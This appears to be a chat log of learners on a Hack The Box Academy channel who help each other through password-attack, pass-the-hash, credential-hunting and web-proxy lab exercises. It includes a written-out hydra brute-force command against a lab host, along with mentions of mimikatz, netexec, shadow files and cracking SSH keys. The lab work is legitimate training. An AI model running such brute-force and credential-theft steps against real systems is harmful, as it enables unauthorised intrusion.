so dictionary attacks clearly aren't the answer here

Should I stop it?

I'm in password attacks hard lab

Read the hint and see if you can create a custom password list for the username they provided.

Didn't they give you a name to jump from?

Yes I'm using it

Johanna

But it says account on ip might be valid but not active for remote desktop

Just have patience

Oh okay so it's normal?

That's just a default response

Aight aight thx

One message removed from a suspended account.

One message removed from a suspended account.

One message removed from a suspended account.

That hint also gives you a username and a base password that you can work from.

I caught onto this and started doing this. I am using a tool called crunch to try and create a password list. I need help creating a list that keeps the order of the characters in tact while trying both upper and lowercase and including numbers too

I would just use what was provided in the course. Pretty sure they provided a custom rules file?

I did that but I think I'm doing it wrong

Revisit Password Mutations and if you think you are doing something wrong, you can shoot me a DM and I will check out what you are trying.

Can anyone help me on password attacks,

Pass the hash

Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.
I have davids hash but i dont know how to connect to DC01, i tried using invoke-thehash, and i get permission denied.

I used the knowledge I had learned to find a website vulnerability 。。。then.。。what should i do now?

Where should I report this news? Or do I keep trying to exploit his vulnerabilities?

Typically the https://website.com/security.txt will have instructions on reporting

Hi guys for the password reuse/default passwords module does anyone have any clues they could give me pls?

oh~ thankyou

Isn't there a default cred cheatsheet in that? If that's the one I'm thinking

there is I believe

open you files /usr/share/wordlists/dirbuster/

Different thing entirely

ill check it out @fathom pendant

thanks

Yeah there's a like a handful of mysql creds

😩

u mean in the cheat sheet?

Yes

ahh ok cool

Also you need to be connected to the host to try and connect

u mean vpn?

i connect to mysql using mssql?

No

I don't recall what that section asks you to do

it asks us to get mysql creds

Btw this is very vague and pisses me off, you can be more direct with your question

Ok, and you need to first connect to the target via ssh

my bad lool

Hello
I need a small hint with this question: “Examine the target and find out the password of the user Will. Then, submit the password as the answer.” I already found Kira’s password; I checked the .mozilla folder and found a logins.json file with the encrypted password, but when I try using the 3 tools provided in the module, none of them work. What should I do?

ill try be more specific next time

There are links in my profile to ask better questions

Transfer the tool to the target to get the answer

No fucking way hydra is still going

Then you're likely doing something wrong

ok

Bro idk it's been going for basically 2 hours

Then you're doing something very wrong

It should not take 2 hours

are u on the password attack module? that also took me ages

There's also other tools like netexec

think its something wrong with htb

They're on the hard assessment

ohh mb

When I transfer them, they don’t work for me.

Use a precompiled version

The command was hydra -l Johanna -P mutatedpass.list rpc://ip -t 34 -f -vv

Password Attack hard lab

Tet with rdp, or with netexec

Test*

Ok

But this is what I'm supposed to do for this module right?

Recommended wordlist?

Usernames from /xato-net-10-million-usernames.txt didnt do the trick

Yes

https://academy.hackthebox.com/module/113/section/1217

Try cirt-default

Lol thank you found it right away, xato found the same word but in lowercase...

It's silly that I think it's case sensitive

Hydra netexec and crackmap exec don't support rpc

Only rpd

Indeed

So do I just let hydra run rpd?

Even tho it's been 2 hours?

Rdp* and yes, it shouldn't take long

Aight

Thx I'll report back in idk 30 mins

Did you try mimikatz?

Thank you very much

im learning shells & payloads > bind shells, and im doing everything exactly as it tells me to do, but for some reason it just chooses not to work

i cant navigate anything, i cant change directories or execute commands

Yes i tried mimikatz to try to sign in as david, and i used mimikatz to hashdump for david and i tried using davids ntlm hash.

Would anything change if I switch from my wifi connection to cellular data?

For speed? It's not giving me any error while on wifi

... yeah

You can DM

ok one sec let me get the images

Fr? Can that be the reason it always takes a lot of time?

Absolutely

Ok I switched from wifi to cellular it's not going faster

Oh cellular is typically worse

Hope it gives me something

Idk bro what else could it be?

Now it's going at the same speed as with wifi

I'm seeing the credentials being tried bc I did -vv

In the command

¯_(ツ)_/¯

Is there anyone I can pay to help

I legally cannot take money

Yes I asked if there's someone who can help me

I'd be careful offering money for services

Do you know anyone who is good with these things and could help me solve this problem?

You never know who may pick you up on it, and what they may do

Bro what's the alternative? I literally wasted 2 days waiting for hydra to give me

Something

Are you using the mutated list?

Gen q

And I'm still waiting for password attack module to be finished. There must be something wrong with my laptop or my connection or something bc everyone else is telling me hydra shouldn't ALWAYS take 2 hours + to finish

Yes and I have another hydra running with normal list

Uh? I'd just pay for knowledge I'm not giving anyone access to my laptop

Don't run multiple at once

G0b is more referring to people that would just scam you

Also it wouldn't have anything to do with your computer, just your connection

¯_(ツ)_/¯
Idk bro there must be something wrong, I can't keep waiting for someone to give me advice on discord

I assume you've tried switching from UDP to TCP?

What is your ping to the VPN server?

I am using tcp

My ping?

Yes

Open a command prompt, and run ping <hostname of the VPN server, or IP of the target>

It's how long it takes for a packet to travel from your computer, over the internet and back again to a target.

Ping target ip

64 bytes from ip icmp_seq=10 ttl=127 time=146ms

That's not too bad.. not great, but not terrible

Can you let it keep running? Do you get any dropped packets (packet loss)

I just keep seeing lines like this one

No weird stuff

Any missing numbers in the icmp_seq= field?

like icmp_seq=10 then after a bit icmp_seq=20 comes up

No it's 150 151 152

If you CTRL+C out, it should show you any packet loss stats

177 packets sent 0% packet loss

Ok, so it's not the network.. although 146 ping is not amazing, it's still ok

Ye

Honestly I'm not familiar with the module you are doing, just wanted to check it wasn't a network issue

It's not just this module, all modules take this long while using hydra

It's past 3 hours now

What's your general down/up speeds

Bruteforcing can sometimes take a long time, but I thought Academy modules were made in such a way to avoid such long delays like that

Also i suggest resetting the target and starting a fresh attempt

Mhhh idk how do I check it

Speedtest.net

I tried it with many other modules it's always the same thing

I also suggest trying with the pwnbox instead

But what's weird is that John takes very little time to crack something so it's prob not the laptop

Are you running it in Verbose mode, to see if there is anything really odd going on? -v or -V option

If you choose to test with the pwnbox you'll need to stop the vpn connection on your own machine

Yes I did -vv

I wanted to learn using these things with Kali : (

Download speed 21.23 upload 11.00

..and I assume no weird warnings or anything

Oof

That's just slow network speeds

Oh my god

how big is your password list

wc -l <list name>

Mutated password list from resources

It should be the top of the mutated list btw

You can likely guess it faster at this point

94000

It's at letter b

You're on the hard lab yeah?

Yes

Yeah it's before that

Tf I used -f in the command

Btw I'm trying speedlist.net again with wifi instead of cellular

Download 88.52 upload 20.18

It's at Basketball2005

I'm telling you the password is not that far down

Also try another remote service then

Did I do anything wrong? I was told to use -f flag

||winrm||

Hydra -l Johanna -P mutatedpass.list service://ip -f -t 34 -vv

This command is okay?

It should

Though I used netexec for this instead

Unknown service

With hydra

I don't recall if hydra supports winrm

Lemme try something else

Is this normal?

Why are you going through a list of names?

Bc I got the wrong command I'm using Johanna now

You can also pipe to grep to filter out the '[-]'

And just wait a minute for it to get the result

I don't understand what this means, what is the '[-]'?

Look at the results you had from the other command and use your brain

grep -v 'pattern' is an inverse grep

Just the list of wrong passwords?

Meaning it will show every line that doesnt contain the pattern

Netexec is preferred, since that's still being maintained

Doesn't netex or crackmapexec stop once it find the right creds?

Yes

You don't need to find multiple creds

I'll wait 30 minutes if it's still not finding it I'll close everything and look for an indian guy on fiver

Shits beyond ridiculous

What

Why u angry

Skill issue if you have to resort to paying someone else

Yes

I do lack in skills

This is why I'm here

i shouldn't have had to point you to the fact multiple different remote services that exist ¯_(ツ)_/¯

Bro I said multiple times I tried different machines with different service at different times with different vpns, it's all the same

Hydra or crackmapexec or whatever just runs and doesn't stop

Sometimes it finds it but it might 2/3 hours

It shouldn't but you also have 20Mb internet so it may take a bit longer, but I can tell you that the pw is earlier

If netexec works do I need to use hydra for other stuff?

Like in general to brute force stuff

Is there any particular cases where you need hydra specifically?

Fuck me it worked

@fathom pendant thank you marcielee

Sometimes your unnecessarily sarcastic but you know your shit thx

Idk I'm having hella problems with hydra, if you can use netexec for everything I don't think I'll ever use hydra again

At least it works😭

I don't believe in holding your hand. You'll need to work problems out using at least one of your two braincells

I'm doing the Linux Credential hunting section of password attacks module. I am logged in as Kira. I have found a zip file that I think has the password I am looking for for the other user but I don't have permission to open it. How do I bypass the permissions and open the file?

or unzip the file rather?

Hello, it may be a dumb question but I'm stuck on the module "Attacking Common Services" at the FTP part.
My nmap scan doesn't return any result even with -p- for all port. Tried various way to bypass it but didn't worked really well. I finally found the port but after that I can't do anything (no anonymous session, no brute force using the provided list...). Am I dumb ?

You're looking in the wrong place

Look at the methods described in the section

The zip file is for another section

ok thanks

I also saw the shadow file for will in Will's folder

I know there's a shadow file in will's folder but I'm having trouble figuring out how to read it

reason is I am trying the different things in the section and its not working

can someone give me a hint? I've tried a bunch of techniques from the section

I am trying to download lazagne onto the target host and use that as a last resort but the target is not on internet

Just cat it

At least that’s how you’d read etc shadow

ya but if I cat it it says permission denied

I tried that already

I don’t remember it top of my head, but usually just follow the section and replicate in exercise

Don’t divert too much

can someone help me with burp really quick?

i am trying to edit a response, but unable to edit the response... can't change anything, it doesnt let me type

intercepted the request, sent to repeater, trying to edit the response to resend but cant change at all

Repeater only repeats the request. Not the response

how can I change the html? I need to enable a button that is currently disabled, i see it disabled in the html

You can turn on response interception in settings

You'd need to hard refresh [ctrl+shift+r] the page for it to capture it

<body>
<form name='getflag' class='form' method='post' id='form1'>
<button class='btn block-cube block-cube-hover' id='submit' type='submit' formmethod='post' name='getflag' value='true' disabled>

there's a disable in the html, but not sure how can i change it using the request only

You're not

There's an option to intercept the response and edit it

Then have that send

i cant send screenshots here :/

Because your account isn't linked. Or something is wrong with the identifier and you'll have to have a mod help

got it, how can i link my account

wait, i see it

The button in the account page doesn't do anything

Instructions are in #welcome

https://matthewsetter.com/introduction-to-burp-suite/

It's also described in the web proxies module

Which I'm assuming they're working on

I know

Some people will come to the channel and ask stuff that could be related to some module but might not be going through the material

They just don't read at all, most of the time

I am reading guys

but it's kind of complicate when it's in a different language that is not yours lol

and i just started, if that bothers im sorry

hi I found the authorized keys file and the id_rsa file

am I supposed to crack those?

Do what you think

where can I find recommended boxes for modules I completed ?

nvm u just click on dashboard on the completed module

testing

So in regards to the web proxy module, in the ZAP Scanner section towards the end, the lesson seems super straight forward (albeit it a bit out of date).

It was mentioned to me that the ZAP Hud isn't needed, and so after trying both with and without using ZAP HUD. It still seems like there's no high level vuln detected after doing an active scan.

Tried it a couple times, But no dice. Has anyone else run into this/had similar issues? Or am I missing something really obvious.

Seems like a really simple lab, so it's curious why the scan isn't revealing the high level vuln mentioned in the instructions

@supple meteor be careful with spoiling anything from the AEN module, also sometimes when you've added a user to a group, you'd need to log out and back in.

It will find the vuln, it takes a while

Why does it say no hashes loaded

you can also have it start from a potentially vulnerable endpoint

because he hash doesn't match what is expected for hashcat to crack it

"salt-value exception"

it tells you just above the "no hashes loaded" message

so something about your hashfile isn't formatted properly

sorry, but I supposed that's different host ?

If I'm not mistaking in the .hash file generated by john you have few information that hashcat doesn't recognize this is why it doesn't works. With john it should works. Else you need to extract the part of the .hash file that hashcat can process

what i'm saying is if you didn't log out and back in, then the user may not have been synced/added to the group

but i don't recall needing to add any user to a group tbh